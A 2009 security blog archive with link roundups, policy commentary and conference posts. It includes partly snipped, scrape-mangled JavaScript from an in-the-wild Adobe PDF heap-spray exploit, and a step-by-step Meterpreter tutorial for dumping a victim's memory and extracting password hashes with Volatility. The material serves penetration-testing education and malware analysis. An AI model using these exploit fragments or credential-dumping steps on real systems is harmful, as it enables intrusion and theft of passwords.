Sunday, March 29, 2009

Shotgun Blast for 29 March 2009

Couple of articles/blog posts worth taking a look at

Info on Ghostnet
*mirrors of the two papers are available above

I am personally glad when i see people getting pwned via client-sides make the news. Hear me and Vince talk about it a Notacon and DojoSec this month!

It's also interesting, at least to me, to see real cyber warfare in action. cyber warfare doesnt have to be about stuff going boom, but having another nation state all in your network for god knows how long certainly makes you wonder how much of your "secret" activity isnt secret anymore.

Application Operation System Fingerprinting From Dan Crowley
his blog:

Sweet new updates to metasploit!

no link...just svn up your trunk and enjoy! the snmp community scanner is nice.

Weaponized Malware ??

while the question of what the home user is to do is tougher, in the enterprise keeping up with what is egressing your network may help with catching that malware calling home. It probably time to start looking at the problem as its going to happen how do I detect and respond instead of just "hoping" it doesnt happen.

What is conficker going to do on April 1st?

do we worry or not? do you deserve what you get if you still have it in your network after this long?

If you allow gaming systems on your network without authentication can an attacker abuse that?

definitely something to keep in mind if a network requires authentication, can you change your MAC to that of a wii or xbox360 and gain access?

Exploiting Unicode Enabled Software by Chris Weber

Tuesday, March 24, 2009

Moving Cybersecurity from DHS to White House

From here:

“Forthcoming legislation would wrest cybersecurity responsibilities from the U.S. Department of Homeland Security and transfer them to the White House, a proposed move that likely will draw objections from industry groups and some conservatives.
CNET News has obtained a summary of a proposal from Senators Jay Rockefeller (D-W.V.) and Olympia Snowe (R-Maine) that would create an Office of the National Cybersecurity Advisor, part of the Executive Office of the President. That office would receive the power to disconnect, if it believes they’re at risk of a cyberattack, “critical” computer networks from the Internet. “I regard this as a profoundly and deeply troubling problem to which we are not paying much attention,” Rockefeller said a hearing this week, referring to cybersecurity…”

and a DHS response here:

I'm a simple guy and I'm going to over simplify my response. So here goes.

Politics and money aside, because there is alot of both for this issue DHS would be dumb not to fight to keep control of mission for the sheer amount of $ being thrown at it, without strong leadership and authority it wont matter who is in charge of cybersecurity for the US.

When I was just getting interested in security and still in college I went to Black Hat New Orleans 2002, and listened to Erik Birkholz's "How To Fix a Broken Window" talk.

From the talk description:

C:\>net send * “Don’t expect secure networks if you haven’t empowered your internal security team.”

Security vs. usability may finally become a balanced equation. All the usability in the world isn’t worth a damn if your internal network is a wasteland of default configurations and blank passwords. Security teams are now a required internal resource. Contrary to popular belief there are NOT 24 working hours in a day. Security can not be treated as a side order. The excuses need to stop - now.

The amount of the above that still rings true 7 years later is just ridiculous but the important thing I took from that talk 7 years ago that is still true today is don't give people the responsibility of security and no authority to do anything about it.

So what does that have to do with DHS & the White House and who's calling the shots? Well, the fact that DHS and U.S. Cert have all the responsibility but no authority. The U.S. Cert can send .gov organizations alerts, advice, guidance, incidents, threats, whatever all day long, but at the end of the day they really cant make those .gov entities do shit. That is the sad reality, those other agencies in most situations don't have to listen to the cert or can merely say "we took care of it" and there is no secondary investigation to be done or allowed. Additionally, there seems to be no punishment for receiving failing FISMA grades or having numerous amounts of security incidents, unless you call getting extra funding "to fix the problem" a punishment.

The simple version is this:
If things don't change...if the authority to withhold funds, internet access, or the ability to fire people who show gross incompetence or the inability to handle the security responsibility of their organization, if we dont stop putting people in CSO/CIO positions who have no security background, if getting a failing FISMA grade doesn't actually mean anything, and if we dont change the broke ass way that some .gov agencies operate it wont matter who is responsible for cybersecurity or how much money you throw at the problem its still gonna be jacked up. In fact, who's to blame bad guys for breaking into networks that are just so damn easy to break into?

Thoughts On Pentesting Must Evolve Or Die

So the latest article by Brian Chess didnt stir up quite the controversy that that his pentesting dead in 2009 interview/article but this one is worth a read:

Its a short article and not near as controversial as the dead in 2009 one but three quotes...

"People are now spending more money on getting code right in the first place than they are on proving it is wrong. However, this does not signal the end of the road for penetration testing, nor should it, but it does change things. Rather than being a standalone product, it is going to be more like a product feature. Penetration testing is going to cease being an end unto itself and re-emerge as part of a more comprehensive security solution."

"2009 will be the year this strategy comes together, and when we look back, it will be the year when most of the world began thinking about penetration testing as part of a larger offering."

All that is good news (I think), secure coding is where things need to go but I personally dont feel any amount of secure code will ever completely replace pentesting as long as its possible to mis-configure it or set it up insecurely. So Microsoft Windows at some point may be free of stack overflows (or any memory corruption exploits) but that wont stop some system admin setting up their domain in some insecure fashion. That will still need to be pentested to discover and help remediate. Which leads me to the last quote...

"More than ever before, people understand the software security challenge, and penetration testing deserves credit for helping spread the word. But knowing a security problem exists is not the same as knowing how to fix it. In other words, penetration testing is good for finding the problem but does not help in finding the solution – and that is why it must take a long hard look at itself and then make a change. Just like the venerable spell-checker, it is going to die and come back in a less distinct but more pervasive form and I, for one, cannot wait."

I dont agree with this. Penetration testing/testers should never leave you without a fix to security issues. I know alot of pentesters and I dont know any that dont give the customer recommendations for remediations and a customer shouldn't accept a pentest that doesnt have recommended fixes. I suspect that what Chess meant here were "problems" like SQL injection vulns or code bugs that a source code scanning tool could help find and recommend the secure way to code it where a pentester may say "recode it", "have your developers find and fix the code" or "you may have improper parameter checking in this public function", etc.

I do agree that pentesting should evolve, but I think it should begin to look more at assessing an organization from many angles and taking the path of least resistance than pentesting the network side one quarter, the web app side the next, physical security the next, etc. When we begin to identify what makes us money, then look at how we are protecting it across the enterprise, then testing all those defenses at the same time, then we are evolving in the right direction. The evolution should be Full Scope pentesting and not the way most shops do it now.

Anyone else have thoughts on the article?

175+ deleted blog spam posts later...

I've enabled comment moderation and captcha. Normally i wouldnt have cared but since I sat thru Val Smith's and Collin's talk twice on what they are doing with that stuff I couldnt let it linger.

sorry for the new hoop to jump through everyone.

if you come across any i missed please let me know.

Monday, March 16, 2009

Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition

Here's the video from our Client-Side talk at SOURCE Boston 2009

Full Scope Security Attacking Layer 8: Client-Side Penetration Testing SOURCE Boston Edition from FullScopeSecurity on Vimeo.

Why SOURCE Boston was the best con I've ever been to

You don't have to just take my word for it...

So we just got back from SOURCE Boston. It was by far the best conference I have ever been to from pretty much all perspectives.

Pretty much all the talks were great, I found myself sitting in talks and wishing I had a second me (I wish that quite frequently actually) so I could sit in one of the other talks. Now this happens often a other cons, but this was for the whole con schedule. The SOURCE advisory board picked great talks. The location of the hotel was great, it wasn't too crowded, and the SOURCE organizers totally took care of the speakers with free food and booze (I felt very well taken care of), the securitytwits with free food and booze, and the con-goers with free food and for pay booze but threw a really nice party. It was also extremely cool to get to interact with some of the Original Gangster l0pht guys and all the other con attendees especially the Attack Research guys, the NYSEC guys, and many many others.

I had such a good time that I'm currently trying to scheme a way to pull off FRHACK, BruCon and SOURCE Barcelona in September.

Oh and for shameless self promotion Chris Wysopal gave our client-side talk a nice review:

PDF Exploits now with Heapspray

So right after the latest Adobe 0-day was found in the wild and it was seen to be using heapspraying as part of the exploit and payload delivery I noticed a change in the other Abobe exploits doing the rounds. Both the Adobe printf() and collectEmailInfo() exploits are now taking advantage of heapspraying. I guess it makes sense considering that most, if not all, of the pdf exploits are being delivered via a link rather than an attachment. The browser will render the pdf within the window and so heapspraying will work nicely. This does limit it to IE though.

Another interesting change is that I'm seeing both exploit vectors in a single pdf. A quick visit to hxxp:// returned a pdf with the following javascript:
function fix_it(yarsp, len)
while (yarsp.length*2
yarsp = yarsp.substring(0,len/2);
return yarsp;
var version = app.viewerVersion;
if (version > 8)
var payload = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9%u5824...snip...");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < block ="" mem =" new" i="0;i<1400;i++)">
var num = 12999999999999999999888888...snip...;
var addkk = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9....snip...");

var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;

for (var count=0;countcount2;count++)
mem_array[count] = yarsp + addkk;
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length <>
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
Nothing new really but it's always interesting to see how the exploits and their delivery mechanisms evolve.
dean de beer

Monday, March 9, 2009

Presentation on Client-Side Attacks at SOURCE Boston

Alright its time for SOURCE Boston!

I'm happy to announce that g0ne and I will be there presenting on:

Attacking Layer 8: Client-Side Penetration Testing

We'll be talking about why you should be allowing your penetration testers to use client-side attacks during their assessments , how to use the metasploit framework to deliver client-side attacks with demos (yes other tools do CS attacks but we're poor), and some remediations for client-side attacks.

It will be an extra special big day because we'll be presenting as Full Scope Security, our new security consultancy. More on that later.

If you're not going to make it to SOURCE, we will also be at Notacon 16-19 April 09 and ChicagoCon 8-9 May 09

Sunday, March 8, 2009

Dumping Memory to Extract Password Hashes

Originally posted on Attack Research

Dumping memory with MDD using Meterpreter

adapted from:

ManTech Memory DD (MDD) ( is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:



C:\tools\mdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)
0 map operations failed

took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image" . MDD function is limited to copying physical memory, so you will have to utilize another tool to analyze the memory image.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

Execute MDD to capture RAM on the victim machine.

meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144

Optionally we can just use execute to run the tool without opening a command prompt, really doesnt matter as we are going to be pulling down 256+ MB of data we wont exactly be "stealthy"

meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.

Verify memory image has been captured.

meterpreter > ls

Listing: C:\

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd

meterpreter >

Now that we have our .dd image locally you can utilize instructions from to grab the passwords out of memory.

Volatility -->

Installation and getting started: Download and unzip volatility from the above location, download and install the patches from --> You will need to overwrite your existing forensics, memory_objects, and memory_plugins folders. Once you are done when you run python volatility you should have the hivescan/hivelist options as well as other stuff.

$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree

Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry

memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. Run hivescan to get hive offsets

$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38

2. Run hivelist with the first hivescan offset

$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60 \WINDOWS\system32\config\software
0xe1a5a7e8 \WINDOWS\system32\config\default
0xe165cb60 \WINDOWS\system32\config\SAM
0xe1a4f770 \WINDOWS\system32\config\SECURITY
0xe1559b38 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Find Password Hash (-y System Hive Offset)(-s SAM Hive

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60

Couple of updates

1. This technique only works on XP SP2 & SP3, no Vista, no Server 2003

2. New home for volreg plugins: